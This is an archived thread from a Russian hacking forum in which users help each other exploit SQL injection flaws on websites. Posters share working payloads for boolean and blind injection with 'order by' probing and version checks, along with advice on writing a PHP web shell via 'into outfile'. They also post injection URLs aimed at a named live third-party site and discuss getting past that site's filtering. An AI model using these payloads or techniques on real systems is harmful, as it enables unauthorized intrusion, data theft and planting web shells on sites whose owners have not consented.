ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
27.09.2010, 06:25
|
|
Guest
Сообщений: n/a
Провел на форуме:
262707
Репутация:
935
|
|
Сообщение от YuNi|[c
YuNi|[c said:
э хз как обойти в таком раскладе, может подскажем:
http://localhost/script.php
POST
ref=BIG'
что не пробовал на все одинаков ответ ((
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ')' at line 3
Что за трабла тут со скобками?
ref=BIG') and 1=0 по идеи должен съесть но ничего из БД не выдать.
ref=BIG') and 1=1 а так выдать
ref=BIG') order by 10000 -- по идеи тоже должно сработать выдать Unknown column '10000'
ну а дальше ты понял, и если у тебя на локалке, то привел бы код из скрипта, который обрабатывает переменную $_POST['ref'] и делает с ней запрос в БД
|
|
|
|
27.09.2010, 18:31
|
|
Познающий
Регистрация: 10.01.2008
Сообщений: 58
Провел на форуме:
122329
Репутация:
-2
|
|
Кто компилил сие чудо под gcc ? http://inj3ct0r.com/exploits/7595(паблик).Выдаёт кучу синтаксических ошибок.Разумеется,SunOs 5.10/5.11
|
|
|
27.09.2010, 19:02
|
|
Участник форума
Регистрация: 01.10.2009
Сообщений: 105
Провел на форуме:
559542
Репутация:
94
|
|
Сообщение от Welemir
Welemir said:
Кто компилил сие чудо под gcc ? http://inj3ct0r.com/exploits/7595(паблик).Выдаёт кучу синтаксических ошибок.Разумеется,SunOs 5.10/5.11
Его компилировать не надо, вроде, это sh скрипт.
Создай файл, закинь в него содержимое сплойта, и запусти ./exploit.sh
|
|
|
|
27.09.2010, 19:26
|
|
Новичок
Регистрация: 01.04.2009
Сообщений: 14
Провел на форуме:
92038
Репутация:
10
|
|
Сообщение от Strilo4ka
Strilo4ka said:
копипась моего поста, не помню где он.
Joomla_1.5.15-Stable-Full_Package.zip
у себя проверял
Код:
Code:
http://localhost/lastjoom/index.php?limitstart=-5
может поможет. Спасибо огромное,
Но видимо не все версии подвержены, у некоторых не показывается,
|
|
|
|
28.09.2010, 06:28
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476
Репутация:
66
|
|
Сообщение от Expl0ited
Expl0ited said:
ref=BIG') and 1=0 по идеи должен съесть но ничего из БД не выдать.
ref=BIG') and 1=1 а так выдать
ref=BIG') order by 10000 -- по идеи тоже должно сработать выдать
Unknown column '10000'
ну а дальше ты понял, и если у тебя на локалке, то привел бы код из скрипта, который обрабатывает переменную $_POST['ref'] и делает с ней запрос в БД
Вообще то вот так выглядит запрос по настояшему:
Код:
Code:
script.php?Sex=female&YearFrom=18&YearTo=40'
а ответ:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'+1 YEAR) AND upApproved = '1' LIMIT 1' at line 3
на тот же
Код:
Code:
script.php?Sex=female&YearFrom=18&YearTo=40') order by 1000--
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\') order by 1000--+1 YEAR) AND upApproved = '1' LIMIT 1' at line 3
пробовал разные варианты и floor rand не пашет ((
PS.так как линк крупный не постил тут. Прошу помочь если у кого есть идеи
|
|
|
|
28.09.2010, 08:30
|
|
Guest
Сообщений: n/a
Провел на форуме:
262707
Репутация:
935
|
|
Сообщение от YuNi|[c
YuNi|[c said:
Вообще то вот так выглядит запрос по настояшему:
Код:
Code:
script.php?Sex=female&YearFrom=18&YearTo=40'
а ответ:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'+1 YEAR) AND upApproved = '1' LIMIT 1' at line 3
на тот же
Код:
Code:
script.php?Sex=female&YearFrom=18&YearTo=40') order by 1000--
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\') order by 1000--+1 YEAR) AND upApproved = '1' LIMIT 1' at line 3
пробовал разные варианты и floor rand не пашет ((
PS.так как линк крупный не постил тут. Прошу помочь если у кого есть идеи
Код:
Code:
script.php?res=1&Sex=female&YearFrom=11+YEAR)+and+1=if(substring(version(),1,1)=5,0,1)+--+
|
|
|
|
28.09.2010, 14:40
|
|
Новичок
Регистрация: 09.11.2007
Сообщений: 24
Провел на форуме:
60954
Репутация:
3
|
|
Друзья, по всей видимости есть уязвимость на одном сайте:
http://site.com/feedback/index/20'
при этом вижу ошибку:
A Database Error Occurred
Error Number: 1064
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%27, 10' at line 6
SELECT * FROM (`guestbook`) WHERE `parent` = 0 AND `moderated` = 1 ORDER BY `id` DESC LIMIT 20%27, 10
Первый раз столкнулся с таким типом sql-injection и тольком не получается ничего раскрутить. Как действовать в таком случае, подскажите?!
|
|
|
|
28.09.2010, 15:09
|
|
Guest
Сообщений: n/a
Провел на форуме:
262707
Репутация:
935
|
|
Сообщение от Derec
Derec said:
Друзья, по всей видимости есть уязвимость на одном сайте:
http://site.com/feedback/index/20'
при этом вижу ошибку:
A Database Error Occurred
Error Number: 1064
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%27, 10' at line 6
SELECT * FROM (`guestbook`) WHERE `parent` = 0 AND `moderated` = 1 ORDER BY `id` DESC LIMIT 20%27, 10
Первый раз столкнулся с таким типом sql-injection и тольком не получается ничего раскрутить. Как действовать в таком случае, подскажите?!
там фильтрация символов в движке, по этому ничего не выйдет.
|
|
|
|
28.09.2010, 15:10
|
|
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
Провел на форуме:
2212846
Репутация:
56
|
|
Сообщение от Derec
Derec said:
Друзья, по всей видимости есть уязвимость на одном сайте:
http://site.com/feedback/index/20'
при этом вижу ошибку:
A Database Error Occurred
Error Number: 1064
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%27, 10' at line 6
SELECT * FROM (`guestbook`) WHERE `parent` = 0 AND `moderated` = 1 ORDER BY `id` DESC LIMIT 20%27, 10
Первый раз столкнулся с таким типом sql-injection и тольком не получается ничего раскрутить. Как действовать в таком случае, подскажите?!
Инъекция в лимите.
В данном случае инъекция не возможна из за присутствия order by.
Если нет order by, то крутиться, как обычно, через union select
Если позволяют условия, то попробуй сразу залить шелл:
1 limit 1 into outfile '/path/shell.php' lines terminated by "" --
1 limit 1 into outfile '/path/shell.php' fields terminated by '' optionally enclosed by "" --
|
|
|
|
28.09.2010, 15:44
|
|
Познающий
Регистрация: 06.06.2008
Сообщений: 76
Провел на форуме:
117639
Репутация:
55
|
|
вот тоже интересный случай:
http://www.asiafuns.com/search_results.php?country=163+and+substring%28ver sion%28%29,1,1%29=5+--+ все нормуль
http://www.asiafuns.com/search_results.php?country=163+and+ascii%28substri ng%28%28select+column_name+from+information_schema .columns+limit+1,1%29,1,1%29%29%3E0+--+ редиректит на главную
тоже самое если пробовать union select
http://www.asiafuns.com/search_results.php?country=163+order+by+3+--+ норм
http://www.asiafuns.com/search_results.php?country=163+union+select+1,2,3+--+ редирект
попытки обхода с сменой регистра и добавлением комментариев /*!union+select*/ не проходит.
в какую сторону копать?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
